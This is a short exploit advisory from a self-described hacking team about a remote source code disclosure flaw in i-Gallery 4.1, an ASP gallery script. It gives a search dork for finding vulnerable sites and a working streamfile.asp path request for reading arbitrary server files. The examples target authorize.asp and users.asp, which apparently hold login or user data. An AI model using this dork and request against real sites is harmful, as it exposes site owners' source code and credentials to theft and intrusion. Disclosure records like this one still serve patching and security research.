===========================================================
i-Gallery 4.1 asp Remote Source Code Disclosure Vulnerability
-----------------------------------------------------------
foun by :kurdish hackers team
group : kurd-team
contact : pshela@yahoo.com
site : kurdteam.org
-----------------------------------------------------------
------------------------script-----------------------------
-----------------------------------------------------------
script name: i-Gallery 4.1
site home : http://www.b-cp.com/igallery/download.asp
PRIC:$9.99
-----------------------------------------------------------
dork : Powered By: i-Gallery 4.1
Exploit:
--------
/igallery/streamfile.asp?i=/[file you want].asp
live :
www.site.com/igallery/streamfile.asp?i=/authorize.asp
www.site.com/igallery/streamfile.asp?i=/users.asp
-----------------------------------------------------------
Zryan_kurd ,root-SyS , all Member cold hackers team(cmg-team.com) , all kurdish hackers
-----------------------------------------------------------
================================================================